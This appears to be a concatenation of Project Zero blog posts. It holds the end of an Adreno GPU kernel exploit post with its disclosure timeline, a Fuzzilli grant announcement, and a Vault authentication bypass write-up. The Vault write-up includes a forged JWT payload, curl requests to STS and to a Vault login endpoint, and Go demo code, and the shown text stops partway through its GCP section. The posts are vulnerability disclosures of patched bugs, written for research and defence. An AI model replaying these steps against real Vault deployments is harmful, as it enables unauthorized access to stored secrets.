Once the attack succeeds, a branch to attacker supplied shared memory occurs while protected mode is disabled. This means that the TTBR0 register described above can be modified to point to an attacker controlled physical page that contains a fake page table structure. In the past (e.g. for rowhammer attacks) the setup of a known physical address has been achieved by using the ION memory allocator or spraying memory through the buddy allocator, and I found some straightforward success with the latter approach.


This allows the attacker to map a GPU address to an arbitrary physical address. At this point the attacker's GPU commands can overwrite kernel code or data structures to achieve arbitrary kernel code execution, which is straightforward since the kernel is located at a fixed physical address on Android kernels.


Final Attack


A proof-of-concept exploit called Adrenaline is available here. The proof-of-concept demonstrates the attack on a Pixel 3a device running sargo-user QQ2A.200501.001.B3 with kernel 4.9.200-gdf3ca60d978c-ab6351706. It overwrites an entry in the kernel's sys_call_table structure to show PC control.


Aside from the 20% success rate of winning the race condition discussed above, the proof-of-concept has two other areas of unreliability: 1) ringbuffer offsets aren't guaranteed to be the same across kernel versions, but should be stable once you calculate them (and could be calculated automatically), and 2) the spray technique used to allocate attacker-controlled data at a known physical address is very basic and used for demonstration purposes only, and there's a chance the chosen fixed page is already in-use. It should be possible to fix point 2 using ION or some other method. 


Patch Timeline


The reported issue was assigned CVE-2020-11179, and was patched by applying GPU firmware and kernel driver changes that enforce new restrictions on memory accesses to the scratch buffer by user-supplied GPU commands (i.e. the scratch buffer is protected while running indirect branches from the ringbuffer).



2020-06-08

Bug report sent to Qualcomm and filed Issue 2052 in the Project Zero issue tracker.

2020-06-08

Qualcomm acknowledges the report and assigns QPSIIR-1378 for tracking.

2020-06-12

Qualcomm agrees to schedule a meeting to discuss the reported issue.

2020-06-16

Project Zero and Qualcomm meet to discuss the attack and potential fixes.

2020-06-16

Additional PoC for the rptr bruteforce attack is shared with Qualcomm, as well as a potential bypass for one of the fix approaches that was discussed. Project Zero asks Qualcomm to coordinate with ecosystem partners as appropriate.

2020-06-23

Request for update regarding the potential fix bypass, fix timeline, and earlier request for coordination.

2020-06-25

Qualcomm confirms that the potential bypass can be resolved with a kernel driver patch, indicate that the patch is targeted for the August bulletin, and that Project Zero can ask Android Security to coordinate directly with Qualcomm.

2020-06-25

Project Zero informs Android Security that an issue exists and only provides a Qualcomm reference number. Project Zero asks Android Security to coordinate with Qualcomm for any further details.

2020-07-17

Qualcomm gives an update on the progress of a microcode based fix. The plan is that the fix will be available for OEMs by September 7, but Qualcomm will request an extension to allow more time for patch integration and testing by OEMs.

2020-07-17

Project Zero responds by explaining the option and requirements for a 14-day grace period extension.

2020-07-29

Qualcomm confirms technical details of how the patch will work, and asks for a disclosure date of October 5th, and to withhold the PoC exploit if that's not possible.

2020-07-31

Project Zero replies to confirm a planned disclosure date of September 7 (based on policy), and that the PoC will be released on Sep 7. We predict a low likelihood of opportunistic reuse in the near term due to the complexity of the exploit and the additional R&D required for real-world usage.

2020-08-04

Qualcomm privately shares a security advisory with OEMs. OEMs can then request the fix to be applied to their branch/image.

2020-08-20

Qualcomm shares the current timeline with Project Zero, indicating that they are targeting a November public security bulletin release, and requests a 14-day extension.

2020-08-25

Project Zero reiterates that a fix needs to be expected within the 14-day window for that extension option to apply.

2020-08-25

Qualcomm asks if any OEM shipping a fix within the 14-day window would be sufficient for the grace extension to be applied.

2020-08-26

Project Zero responds with a range of options for how to use the 14-day extension in cases of a complex downstream arrangement. Project Zero requests the CVE-ID for this issue.

2020-08-27

Qualcomm informs Project Zero that the CVE-ID will be CVE-2020-11179.

2020-09-02

Qualcomm provides a statement for inclusion in the blog post, and asks Project Zero to confirm the disclosure date, as the 90-day period ends on a US Public Holiday (Sep 7).

2020-09-02

Project Zero confirms that the new disclosure date is Sep 8, due to the US Public Holiday.

2020-09-08

Public disclosure (issue tracker and blog post)


Recommendations


We can offer a few additional recommendations:


  1. Transparency and openness: One of the surprising observations while performing this attack was the level of complexity and the amount of processing of untrusted data that happens on the GPU. Since the GPU is a critical part of Android's security model, increasing the level of openness to be consistent with other similarly critical components is advisable. Note that this guidance applies to both Qualcomm Adreno and ARM Mali. Practically speaking, this could include publishing any relevant design documentation and source code, while also providing a threat model/security model for the GPU device.

    More generally, the competitive benefits of a closed platform approach to hardware internals should be reassessed in 2020. This balance may have been historically appropriate when the GPU was not in the critical path for security, but today billions of users are relying on the GPU to uphold the operating system security model. 


  2. Variant analysis: It's possible that this issue could have been found and fixed earlier, based on the first report of CVE-2019-10567. The initially adopted fixes by the Adreno engineers were a clever attempt at mitigating the issue, but didn't look particularly reliable or comprehensive at first glance.

    Between Qualcomm, Android Security, and the numerous OEMs that received details of both the original attack and the planned patches, I find it troubling that no one seems to have questioned the efficacy of these patches any further. Personally, I think this is because the work of the teams that triage and respond to external vulnerability reports is often undervalued and underfunded.

    When facing a barrage of external bug reports, it's hard enough to keep your head above water, let alone find the time and mental energy to pursue and understand an individual issue to the level required to find variants. But a high quality bug report is a potential gold mine of insights and ideas for improving your products' defensive posture.

    Speaking to security engineering managers now: finding ways to resource and structure your vulnerability triage team in a way that allows for individual deep dives and tangential pursuits is the best way to extract the maximum value from your external bug reports, and will certainly pay for itself in the long run (in terms of your product's security posture of course, but also in terms of your team's reputation, motivation, and ability to hire). This type of triage work is often seen as a stepping stone to something better, or as a dreaded busy-work rotation, but it doesn't need to be like that.


  3. Vulnerability remediation: All security critical components in Android devices should be updateable within 90 days, including low-level systems like GPU firmware. For components where this is not yet the case, we disclose issues like this hoping to motivate future investments in technology, staffing, and process improvements that will bring the component in line with industry standards.

    There's a temptation to say that "hardware issues" are harder to fix, and so should receive more lenient treatment. However, this bug is best described as a software issue running on an opaque and undocumented platform. This relative obscurity has likely contributed to a lack of review, hardening, testing, and a slower vulnerability remediation process, but these challenges aren't fundamental to the technology itself. With proper investment, bugs like this can be fixed and shipped to users within 90 days. If for any reason that investment isn't possible, it's important that users are made aware of this constraint.


Conclusion


This blog post describes a unique and unusually powerful security issue affecting Qualcomm's Adreno GPU. We outlined the design of the GPU and kernel driver, and some side effects of that design that result in a shared memory attack on the GPU itself. This led to a relatively stable race condition that bypassed the GPU protected mode and gave attacker controlled GPU commands access to arbitrary physical memory. Ultimately this could be used to build an Android sandbox escape exploit that gives kernel code execution. Finally, we discussed the planned fix, the fix timeline, and gave some additional recommendations for areas of future improvement.


Thank you to Guang Gong for first reporting this fascinating style of attack, and to Qualcomm for a very prompt, open, and professional response to my additional research.

Announcing the Fuzzilli Research Grant Program

Posted by Samuel Groß, Project Zero


Project Zero’s mission is to make 0-day hard in order to improve end-user security. We attack this problem in different ways, including supporting other security researchers. While Google currently offers research grants, they are limited to academics and those affiliated with universities. 


Today we are announcing a new USD $50,000 pilot program to foster research into JavaScript engine fuzzing through Google Compute Engine (GCE) credit grants. Here is how it works:


  1. Interested researchers submit a proposal for a project about fuzzing JavaScript engines.

  2. The proposal will be reviewed by an internal review board and, if accepted, the researchers will be awarded up to USD $5,000 in GCE credits per submission to be used for fuzzing.

  3. All bugs found throughout the course of the project must be reported directly to the affected vendors. Researchers can claim full CVE credits and applicable bug bounties.

Overview

The program is designed to promote research into new approaches for JavaScript engine fuzzing. Examples of research areas that we are especially interested in include:

  • Custom, domain-specific sanitizers, such as WebKit's DoesGC validation or bounds check elimination verification, which can help detect bugs that would otherwise go unnoticed as they don't immediately cause observable failures

  • New, possibly domain-specific feedback metrics to guide JavaScript/JIT engine fuzzers

  • Different high-level fuzzing approaches such as differential fuzzing

  • New code mutation or generation approaches that outperform existing ones

  • Targeted approaches to fuzz for variants of previously reported bugs


Applications can be submitted by filling out this form. Submissions are not limited to those in academia or those with a demonstrated track record of success - if you have a good idea in this space, we'd love to hear from you. Incoming submissions will be reviewed by a review board on a regular basis and we aim to respond to every submission within 2 weeks. If the project is accepted, the researchers may be awarded GCE credits worth up to USD $5,000. Researchers can also apply for multiple grants throughout the lifetime of a project. The grants come with the following requirements:

  • The credits must be used for fuzzing JavaScript engines with the approach described in the proposal. The fuzzed JavaScript engines should be one or more of the following: JavaScriptCore (Safari), v8 (Chrome, Edge), or Spidermonkey (Firefox).

  • All vulnerabilities found must be reported only to the affected vendor. Researchers are encouraged to apply Project Zero's 90-day disclosure policy. Researchers may claim CVE credit and any bug bounty payouts for the reported bugs that don't conflict with these requirements.

  • Any newly developed source code must be published under an open source license that permits further research by others. 

  • An interim report for Google only, at the conclusion of the fuzzing, to demonstrate the initial results of the research, so we can determine its efficacy and make our folks in accounting happy.

  • Furthermore, a final report of some form (e.g. a conference paper, a blog post, or a standalone PDF) due no later than 6 months after the first grant for a project has been awarded, including:

    • A detailed explanation of the project

    • Basic statistics about which engines have been fuzzed for how long (CPU time, iterations, etc.)

    • A clear technical explanation of all vulnerabilities discovered throughout the project.


Researchers are encouraged to base their project on the open source Fuzzilli fuzzer if possible, which, amongst other features, already supports distributed fuzzing on GCE.

Timeline

The pilot program will run for one year, from Oct 1, 2020 until Oct 1, 2021. Applications can be submitted at any time during this period, however, the program might end earlier if funds are exhausted.

Motivation

JavaScript engine security continues to be critical for user safety, as demonstrated by recent in-the-wild 0day exploits abusing vulnerabilities in v8, the JavaScript engine behind Chrome. Unfortunately, fuzzing JavaScript engines to uncover these vulnerabilities is generally quite expensive due to their high complexity and relatively slow processing of input. As a rough datapoint, the GCE instances used to find the ~20 bugs with Fuzzilli in 2019 cost around USD $10,000. Income from bug bounty programs is uncertain, as there is no guarantee a new approach will also discover new bugs. Moreover, as any bounty money is paid out only later, researchers need to bear the costs of fuzzing in advance. This likely results in bugs staying unfixed and thus exploitable for longer. This program aims to help solve this problem.


Scope of Pilot

This program is similar to Google Cloud research credits, though that program is limited to university affiliates. In contrast, this program is specifically designed to accept submissions from anyone.


This program is also similar to the Chrome Fuzzer Program. However, the Chrome Fuzzer Program is limited to LibFuzzer-based fuzzers or blackbox fuzzers, neither of which can currently support a fuzzer like Fuzzilli due to technical limitations. In addition, it is also not currently possible to experiment with custom engine “sanitizers” that detect bugs before they result in otherwise observable misbehaviour. Overall, this program allows researchers greater flexibility around their fuzzing approach but limits the scope to JavaScript engine fuzzing.

Legal points

We are unable to issue grants to individuals who are on sanctions lists, or who are in countries (e.g. Cuba, Iran, North Korea, Sudan and Syria) on sanctions lists. You are responsible for any tax implications depending on your country of residency and citizenship. There may be additional restrictions on your ability to enter depending upon your local law.


This is not a competition, but rather an experimental and discretionary grant program. You should understand that we can cancel the program at any time and the decision as to whether or not to award a grant is entirely at our discretion.


Of course, your testing must not violate any law, or disrupt or compromise any data that is not your own.


Enter the Vault: Authentication Issues in HashiCorp Vault

Posted by Felix Wilhelm, Project Zero

Introduction

In this blog post I'll discuss two vulnerabilities in HashiCorp Vault and its integration with Amazon Web Services (AWS) and Google Cloud Platform (GCP). These issues can lead to an authentication bypass in configurations that use the aws and gcp auth methods, and demonstrate the type of issues you can find in modern “cloud-native” software. Both vulnerabilities (CVE-2020-16250/16251) were addressed by HashiCorp and are fixed in Vault versions 1.2.5, 1.3.8, 1.4.4 and 1.5.1 released in August.


Vault is a widely used tool for securely storing, generating and accessing secrets such as API keys, passwords or certificates. It can be used as a shared password manager for human users, but its feature set is optimized for API based access by other services. An example use case for Vault is to provide one of your services, such as your webserver, short lived credentials to your database or a third-party resource like an AWS S3 bucket.


Using a central secret storage like Vault offers security benefits such as centralized auditing, enforced credentials rotation or encrypted data storage. However, a central storage is also a very interesting target for an attacker. Exploiting a vulnerability in Vault could give an attacker full access to a wide range of important secrets and large parts of the target's infrastructure.


Before diving into the technical details of the vulnerabilities, the next section gives an overview about Vault’s authentication architecture and the way it integrates with cloud providers. Readers familiar with Vault can feel free to skip this section.

Authenticating to Vault

Interfacing with Vault requires authentication and Vault supports role-based access control to govern access to stored secrets. For authentication, it supports pluggable auth methods ranging from static credentials, LDAP or Radius, to full integration into third-party OpenID Connect (OIDC) providers or Cloud Identity Access Management (IAM) platforms. For infrastructure that runs on a supported cloud provider, using the provider's IAM platform for authentication is a logical choice.


Take AWS as an example: Almost every workload you can run in AWS executes in the context of a specific AWS IAM user. By enabling and configuring the aws auth method, you can create a mapping between certain IAM users or roles to Vault roles.


Imagine that you have an AWS Lambda function and want to give it access to a database password stored in Vault. Instead of storing hard coded credentials in the function code, a Vault administrator can assign a vault role to the Lambda function execution role using the vault CLI:


vault write auth/aws/role/dbclient auth_type=iam \

              bound_iam_principal_arn=arn:aws:iam::123456789012:role/lambda-role policies=prod,dev max_ttl=10m


This will create a mapping between a vault role named dbclient and the AWS IAM role lambda-role. A vault policy can now be used to grant the dbclient role access to the database secret.


When the lambda function executes, it authenticates to Vault by sending a request to the /v1/auth/aws/login API endpoint. I’ll go into the exact layout of this request later in the post, but for now just assume that the request allows Vault to verify the AWS IAM role of the caller. If authentication succeeds, Vault returns a short-lived API token for the dbclient role back to the lambda function. This token can now be used to fetch the database secret from Vault. Depending on the database backend, this secret could be a static user-password combination, a short lived client certificate or even a dynamically created credential pair.


Using Vault in this way has some nice security benefits: The lambda function itself does not need to contain bootstrap credentials and every access to the database credentials is auditable. Rotating old or compromised database credentials is straightforward and can be centrally enforced.


However, this operational simplicity is only possible because of hidden complexity in the AWS iam auth method. How does the /v1/auth/aws/login API endpoint actually work, and is there a way an unauthenticated attacker can impersonate an arbitrary AWS IAM role? Let's take a look.

sts:GetCallerIdentity

Vault’s aws auth method supports two different authentication mechanisms internally: iam and ec2. We are interested in the iam mechanism, which is the recommended variant and also used in our previous Lambda example. iam auth is built on top of an AWS API method called GetCallerIdentity, part of the AWS Security Token Service (STS).


As its name implies, GetCallerIdentity returns details about the IAM role or user whose credentials were used to call the API. To understand how Vault uses this method to authenticate clients we need to understand how AWS APIs perform authentication:


Instead of attaching some form of authentication token or credential to API requests, AWS requires clients to calculate an HMAC signature for the (canonicalized) request using the caller's secret access key and attach this signature to the request. This mechanism makes it possible to pre-sign a request and forward it to another party to allow a limited form of impersonation. A popular example use case is to give clients the ability to upload a file to S3 without giving them access to credentials with write permissions.


The Vault aws authentication mechanism is a simple variant of this technique. 

The client pre-signs an HTTP request to the STS GetCallerIdentity method and sends a serialized version of it to the Vault server. The Vault server sends the pre-signed requests to the STS host and extracts the AWS IAM information out of the result. The server-side part of this flow is implemented in pathLoginUpdate in builtin/credential/aws/path_login.go:


func (b *backend) pathLoginUpdateIam(ctx context.Context, req *logical.Request, data *framework.FieldData) (*logical.Response, error) {
    method := data.Get("iam_http_request_method").(string)
    ...
    // In the future, might consider supporting GET
    if method != "POST" {
            return logical.ErrorResponse(...), nil
    }

    rawUrlB64 := data.Get("iam_request_url").(string)
    ...
    rawUrl, err := base64.StdEncoding.DecodeString(rawUrlB64)
    ...
    parsedUrl, err := url.Parse(string(rawUrl))
    if err != nil {
            return logical.ErrorResponse(...), nil
    }

    bodyB64 := data.Get("iam_request_body").(string)
    ...
    bodyRaw, err := base64.StdEncoding.DecodeString(bodyB64)
    ...
    body := string(bodyRaw)

    headers := data.Get("iam_request_headers").(http.Header)

    endpoint := "https://sts.amazonaws.com"

    ...

    callerID, err := submitCallerIdentityRequest(ctx, maxRetries, method, endpoint, parsedUrl, body, headers)



The function extracts the HTTP method, URL, body and headers out of the supplied request body, which is stored in data. It then calls submitCallerIdentityRequest to forward the request to the STS server, fetch the result, and parse it with parseGetCallerIdentityResponse:


func submitCallerIdentityRequest(ctx context.Context, maxRetries int, method, endpoint string, parsedUrl *url.URL, body string, headers http.Header) (*GetCallerIdentityResult, error) {
    ...
    request := buildHttpRequest(method, endpoint, parsedUrl, body, headers)
    retryableReq, err := retryablehttp.FromRequest(request)
    ...
    response, err := retryingClient.Do(retryableReq)
    responseBody, err := ioutil.ReadAll(response.Body)
    ...
    if response.StatusCode != 200 {
            return nil, fmt.Errorf(..)
    }
    callerIdentityResponse, err := parseGetCallerIdentityResponse(string(responseBody))
    if err != nil {
            return nil, fmt.Errorf("error parsing STS response")
    }
    return &callerIdentityResponse.GetCallerIdentityResult[0], nil
}

func buildHttpRequest(method, endpoint string, parsedUrl *url.URL, body string, headers http.Header) *http.Request {
    ...
    targetUrl := fmt.Sprintf("%s/%s", endpoint, parsedUrl.RequestURI())
    request, err := http.NewRequest(method, targetUrl, strings.NewReader(body))
    ...
    request.Host = parsedUrl.Host
    for k, vals := range headers {
            for _, val := range vals {
                    request.Header.Add(k, val)
            }
    }
    return request
}


buildHttpRequest creates an http.Request object based on the user-supplied parameters, but uses the hardcoded constant https://sts.amazonaws.com to build the target URL. Without this restriction, we could simply trigger a request to a server under our control and return a fake caller identity.


However, the complete lack of validation for URL path, query, POST body and HTTP headers still looks like a promising attack surface. The next section describes how we can turn this gap into a full authentication bypass.

STS (Caller) Identity Theft 

Our goal is to trick Vault’s submitCallerIdentityRequest function into returning an attacker controlled caller identity. One way to achieve this is to manipulate the Vault server into sending a request to a host we control, bypassing the hardcoded endpoint host. Looking at the buildHttpRequest method, two approaches come to mind:

  • The code calculating the target URL (targetUrl := fmt.Sprintf("%s/%s", endpoint, parsedUrl.RequestURI())) doesn't look very robust against URL parsing issues. However, tricks like embedding a fake userinfo component in the URL and similar ideas do not work against the robust Go URL parser.

  • Even though Vault will always create an HTTPS request pointing at the hardcoded endpoint, the attacker has full control over the Host HTTP header (request.Host = parsedUrl.Host). This could be a problem if a load balancer in front of the STS API makes routing decisions based on the Host header, but blind testing against the STS host did not lead to any success.


After ruling out the easy ways forward, we still have another approach available: Vault does not restrict our URL query parameters. This means we are not limited to pre-signing requests to GetCallerIdentity and can create requests to any action of the STS API. STS supports eight different actions, but none of them gives us the ability to completely control the response. At this point I was slowly getting frustrated and decided to take a look at Vault’s response parsing code:


func parseGetCallerIdentityResponse(response string) (GetCallerIdentityResponse, error) {
        decoder := xml.NewDecoder(strings.NewReader(response))
        result := GetCallerIdentityResponse{}
        err := decoder.Decode(&result)
        return result, err
}

type GetCallerIdentityResponse struct {
        XMLName                 xml.Name                    `xml:"GetCallerIdentityResponse"`
        GetCallerIdentityResult []GetCallerIdentityResult   `xml:"GetCallerIdentityResult"`
        ResponseMetadata        []ResponseMetadata          `xml:"ResponseMetadata"`
}



parseGetCallerIdentityResponse is called on every response received from STS as long as the status code is 200. The function uses the Go standard library XML decoder to parse an XML response into a GetCallerIdentityResponse structure and returns an error if decoding fails.


There is an easy-to-miss problem with this code: Vault never enforces or verifies that the STS response is actually XML encoded. While STS responses are XML encoded by default, STS also supports JSON encoding for clients that send an Accept: application/json HTTP header.


For Vault, this turns into a security issue due to a somewhat surprising feature of the Go XML decoder: the decoder silently ignores non-XML content before and after the expected XML root. This means that calling parseGetCallerIdentityResponse with a (JSON encoded) server response such as '{"abc" : "xzy<GetCallerIdentityResponse></GetCallerIdentityResponse>"}' will succeed and return an (empty) GetCallerIdentityResponse structure.
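
This behavior is easy to reproduce in isolation. The following self-contained sketch decodes a JSON body with an embedded XML blob much like the one above; the decode succeeds and the attacker-controlled Arn field is populated:

package main

import (
	"encoding/xml"
	"fmt"
	"strings"
)

type GetCallerIdentityResponse struct {
	XMLName xml.Name `xml:"GetCallerIdentityResponse"`
	Arn     string   `xml:"GetCallerIdentityResult>Arn"`
}

func main() {
	// A JSON-encoded "STS response" with an XML blob hidden in a string value.
	payload := `{"abc" : "xzy<GetCallerIdentityResponse><GetCallerIdentityResult><Arn>arn:aws:iam::attacker</Arn></GetCallerIdentityResult></GetCallerIdentityResponse>"}`

	var result GetCallerIdentityResponse
	err := xml.NewDecoder(strings.NewReader(payload)).Decode(&result)

	// Prints: <nil> arn:aws:iam::attacker -- the JSON surrounding the XML
	// root is silently skipped as character data.
	fmt.Println(err, result.Arn)
}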


This brings us really close to our goal of spoofing an arbitrary caller identity: we just need to find an STS action that reflects attacker-controlled text as part of its API response, serialize a request to it that includes an Accept: application/json header, and put an arbitrary GetCallerIdentityResponse XML blob into the reflected payload.


Finding a reflected parameter that is not constrained to alphanumeric characters turns out to be tricky. After some trial and error, I decided to target the AssumeRoleWithWebIdentity action and its SubjectFromWebIdentityToken response element. AssumeRoleWithWebIdentity is used to translate JSON Web Tokens (JWT) signed by an OpenID Connect (OIDC) provider into AWS IAM identities. Sending a request to this action with a validly signed JWT will return the sub field of the token in the SubjectFromWebIdentityToken field.


Of course, a normal OIDC provider won’t sign a JWT with an XML payload in the subject field. Still, an attacker can just create their own OIDC Identity Provider (IdP), register it on an AWS account they own and sign arbitrary tokens with their own keys.


Let's put all of this together and walk through the full attack step-by-step.


  1. Create a minimal OIDC IdP. This boils down to generating an RSA key pair, creating an OIDC discovery.json and key.json document and hosting the JSON files on a web server (see here for an example setup using S3).

  2. Use your own AWS account to register an OIDC IdP -> AWS IAM role mapping. It is important to note that the AWS account used for this does not need to have any relationship with our target.

  3. We can now use our OIDC IdP to sign a JWT that contains an arbitrary GetCallerIdentityResponse as part of its subject claim. A decoded example token could look like this: iss, azp and aud match the details specified in step 2; sub contains our spoofed response, identifying us as the AWS IAM account arn:aws:iam::superprivileged-aws-account.


{'iss': 'https://oidc-test-wrbvvljkzwtfpiikylvpckxgafdkxfba.s3.amazonaws.com/',
 'azp': 'abcdef', 'aud': 'abcdef',
 'sub': '<GetCallerIdentityResponse><GetCallerIdentityResult><Arn>arn:aws:iam::superprivileged-aws-account</Arn><UserId>XYZ</UserId></GetCallerIdentityResult></GetCallerIdentityResponse>',
 'exp': 1595120834, 'iat': 1594207895}


  4. We can test if everything is set up correctly by sending a direct request to the STS AssumeRoleWithWebIdentity action using the (signed) token from step 3 and the RoleArn used in step 2:


curl -H "Accept: application/json" \
  'https://sts.amazonaws.com/?DurationSeconds=900&Action=AssumeRoleWithWebIdentity&Version=2011-06-15&RoleSessionName=web-identity-federation&RoleArn=arn:aws:iam::XZY::YOUR-OIDC-ROLE&WebIdentityToken=YOURTOKEN'


If everything goes as planned, STS will reflect the token subject as part of its JSON encoded response. As discussed above, the Go XML decoder will skip all of the content before and after the GetCallerIdentityResponse object, leading Vault to consider this a valid STS caller identity response.


{"AssumeRoleWithWebIdentityResponse":{"AssumeRoleWithWebIdentityResult":

{"AssumedRoleUser":{"Arn":"arn:aws:iam::XZY::YOUR-OIDC-ROLE/web-identity-federation","AssumedRoleId":"AROATQ4R7PP5JJNLOF5P6:web-identity-federation"},

"Audience":"abcdef","Credentials":{...},"PackedPolicySize":null,"Provider":"arn:aws:iam::242434931706:oidc-provider/oidc-test-wrbvvljkzwtfpiikylvpckxgafdkxfba.s3.amazonaws.com/",

"SubjectFromWebIdentityToken":"<GetCallerIdentityResponse><GetCallerIdentityResult><Arn>arn:aws:iam::superprivileged-aws-account</Arn><UserId>XYZ</UserId></GetCallerIdentityResult></GetCallerIdentityResponse>"},

"ResponseMetadata":....}


  5. The final step is to convert this request into the form expected by Vault (e.g. base64-encoding all required headers, the URL and the empty POST body) and to send it to the target Vault server as a login request on /v1/auth/aws/login. Vault will deserialize the request, send it to STS and misinterpret the response. If the AWS ARN/UserId in our fake GetCallerIdentityResponse has privileges on the Vault server, we get a valid session token back, which we can use to interact with the Vault server and fetch some secrets.


curl -X POST "https://vault-server/v1/auth/aws/login" -d '{"role":"dev-role-iam", "iam_http_request_method": "POST", "iam_request_body": "encoded-body", "iam_request_headers": "encoded-headers", "iam_request_url": "encoded-url"}'


{"request_id":"59b09a0b-f5d5-f4c4-8ed0-af86a2c1f5d4","lease_id":"","renewable":false,"lease_duration":0,"data":null,"wrap_info":null,"warnings":["TTL

of \"768h\" exceeded the effective max_ttl of \"500h\"; TTL value is capped

accordingly"],"auth":{"client_token":"s.Kx3bUNw6wEc5bbkrKBiGW6WL","accessor":"TBRh0hvfd4FkYEAyFrUE3i2P","policies":["default","dev","prod"],"token_policies":["default","dev","prod"],

"metadata":{"account_id":"242434931706","auth_type":"iam","role_id":"47faaf36-c8ab-c589-396c-2643c26e7b30"},

"lease_duration":1800000,"renewable":true,"entity_id":"447e1efe-0fd4-aa10-3a54-52405c0c69ab","token_type":"service","orphan":true}}


I wrote a proof-of-concept exploit that takes care of most of the busy work around JWT creation and serialization. While the OIDC provider setup adds some complexity, we end up with a nice authentication bypass for arbitrary AWS-enabled roles. The only requirement is that the attacker knows the name of a privileged AWS role in the target Vault server.


What went wrong here? Looking at it from an attacker's perspective, the whole authentication mechanism seems clever but error-prone. Putting HTTP request forwarding into the unauthenticated external attack surface of a security product requires strong confidence in the implementation and the underlying HTTP libraries. This becomes even more difficult because the security depends on implementation details of the Security Token Service, which might change at any point in the future. For example, AWS might decide to put STS behind a load-balancing frontend which uses the Host header for routing decisions. Without any change to the Vault codebase, this could severely degrade the security of this authentication mechanism from one moment to the next.


Of course, there is a reason why the authentication works as described: AWS IAM doesn’t have a straightforward way of proving a service’s identity to other non-AWS services. Third-party services can’t easily verify pre-signed requests, and AWS IAM doesn’t offer any standard signing primitives that could be used to implement certificate-based authentication or JWTs.

In the end, HashiCorp fixed the vulnerability by enforcing an allowlist of HTTP headers, restricting requests to the GetCallerIdentity action, and validating the STS response more strictly, which is hopefully enough to protect against unexpected changes to the STS implementation or HTTP parser differences between STS and Go.


After finding this issue in the AWS authentication module, I decided to review its GCP equivalent. The next section describes how GCP authentication for Vault is implemented and how a simple logic flaw can lead to an authentication bypass in many configurations.

Exploiting Vault-on-GCP

Vault supports the gcp auth method for deployments on Google Cloud. Similar to its AWS counterpart, the auth method supports two different authentication mechanisms: iam and gce. Whereas the iam mechanism supports arbitrary service accounts and can be used from services such as App Engine or Cloud Functions, gce can only be used to authenticate virtual machines running on Google Compute Engine. Still, it has some interesting advantages: instead of only making authentication decisions based on a service account identity, gce can also grant access based on a number of VM attributes. For example, a configuration could give only VMs in a specific region (europe-west6) access to certain secrets, allow all VMs in the xyz-prod GCP project access, or restrict access even further using instance groups.


Both iam and gce are built on top of JWTs. A Vault client that wants to authenticate creates a signed token to prove its identity and sends it to the Vault server to get a session token back. For the iam mechanism, the client signs the token directly using a service account private key under their control or with the projects.serviceAccounts.signJwt IAM API method.


For gce, the client is expected to run on an authorized GCE VM. It fetches a signed token by sending a request to the instance identity endpoint of the GCP metadata server. In contrast to service account tokens, this token is signed by an official Google certificate. In addition to the normal JWT claims (sub, aud, iat, exp), the tokens returned from the metadata server also contain a special compute_engine claim that lists details about the instance, which are processed as part of the auth process:


"google":{"compute_engine":{"instance_creation_timestamp":1594641932,"instance_id":"671398237781058X

XXX","instance_name":"vault","project_id":"fwilhelm-testing-XXXX","project_number":950612XXXX,"zone":"europe-west3-c"}}


JWT has a number of design choices that make it very prone to implementation errors (see this blog post by Securitum for an overview of typical issues), so I decided to spend a day reviewing Vault’s token processing.


The function parseAndValidateJwt is responsible for processing both gce and iam tokens. It first parses the token without verifying the signature and passes the decoded token into the getSigningKey helper method:


// Process JWT string.
signedJwt, ok := data.GetOk("jwt")
if !ok {
        return nil, errors.New("jwt argument is required")
}

// Parse 'kid' key id from headers.
jwtVal, err := jwt.ParseSigned(signedJwt.(string))
if err != nil {
        return nil, errwrap.Wrapf("unable to parse signed JWT: {{err}}", err)
}

key, err := b.getSigningKey(ctx, jwtVal, signedJwt.(string), loginInfo.Role, req.Storage)
if err != nil {
        return nil, errwrap.Wrapf("unable to get public key for signed JWT: %v", err)
}


getSigningKey extracts the key ID claim (kid) out of the token header and tries to find a Google-wide OAuth key with the same identifier. This will work for GCE metadata tokens, but not for tokens signed by a service account:


func (b *GcpAuthBackend) getSigningKey(...) (interface{}, error) {
        b.Logger().Debug("Getting signing Key for JWT")

        if len(token.Headers) != 1 {
                return nil, errors.New("expected token to have exactly one header")
        }
        kid := token.Headers[0].KeyID
        b.Logger().Debug("kid found for JWT", "kid", kid)

        // Try getting Google-wide key
        k, gErr := gcputil.OAuth2RSAPublicKey(ctx, kid)
        if gErr == nil {
                b.Logger().Debug("Found Google OAuth2 provider key", "kid", kid)
                return k, nil
        }



If this approach fails, the Vault server extracts the subject (sub) claim from the supplied token. For valid tokens, this claim contains the email address of the signing service account. Knowing the key ID and subject of the token, Vault fetches the public key used for signing via the service account GCP API:


        // If that failed, try to get account-specific key
        b.Logger().Debug("Unable to get Google-wide OAuth2 Key, trying service-account public key")
        saId, err := getJWTSubject(rawToken)
        if err != nil {
                return nil, err
        }
        k, saErr := gcputil.ServiceAccountPublicKey(saId, kid)
        if saErr != nil {
                return nil, errwrap.Wrapf(fmt.Sprintf("unable to get public key %q for JWT subject %q: {{err}}", kid, saId), saErr)
        }

        return k, nil


In both cases, the Vault server now has access to a public key that can verify the signature of the JWT:


// Parse claims and verify signature.
baseClaims := &jwt.Claims{}
customClaims := &gcputil.CustomJWTClaims{}

if err = jwtVal.Claims(key, baseClaims, customClaims); err != nil {
        return nil, err
}

if err = validateBaseJWTClaims(baseClaims, loginInfo.RoleName); err != nil {
        return nil, err
}


If verification succeeds, Vault fills out the loginInfo struct that is later used to grant or deny access. If the token contains a compute_engine claim, it is copied into the loginInfo.GceMetadata field:


loginInfo.JWTClaims = baseClaims

if len(baseClaims.Subject) == 0 {
        return nil, errors.New("expected JWT to have non-empty 'sub' claim")
}
loginInfo.EmailOrId = baseClaims.Subject

if customClaims.Google != nil && customClaims.Google.Compute != nil && len(customClaims.Google.Compute.InstanceId) > 0 {
        loginInfo.GceMetadata = customClaims.Google.Compute
}

if loginInfo.Role.RoleType == gceRoleType && loginInfo.GceMetadata == nil {
        return nil, errors.New("expected JWT to have claims with GCE metadata")
}

return loginInfo, nil


As mentioned above, all of this code is shared between the iam and gce auth methods. The issue here is that no check enforces that a token signed by an arbitrary service account doesn’t contain GCE compute_engine claims. While the content in a GCE metadata token is trustworthy and controlled by Google, service account tokens are completely controlled by the owner of the service account and can therefore contain arbitrary claims.


If we follow the control flow of the gce method to the end we can see that Vault uses loginInfo.GceMetadata as part of its auth decision in pathGceLogin if two conditions are met:

  • The VM described in the metadata section needs to exist. This is verified using the GCE API and requires an attacker to impersonate an actively running VM. In practice, only project_id, zone and instance_name are verified and need to be set to valid values.

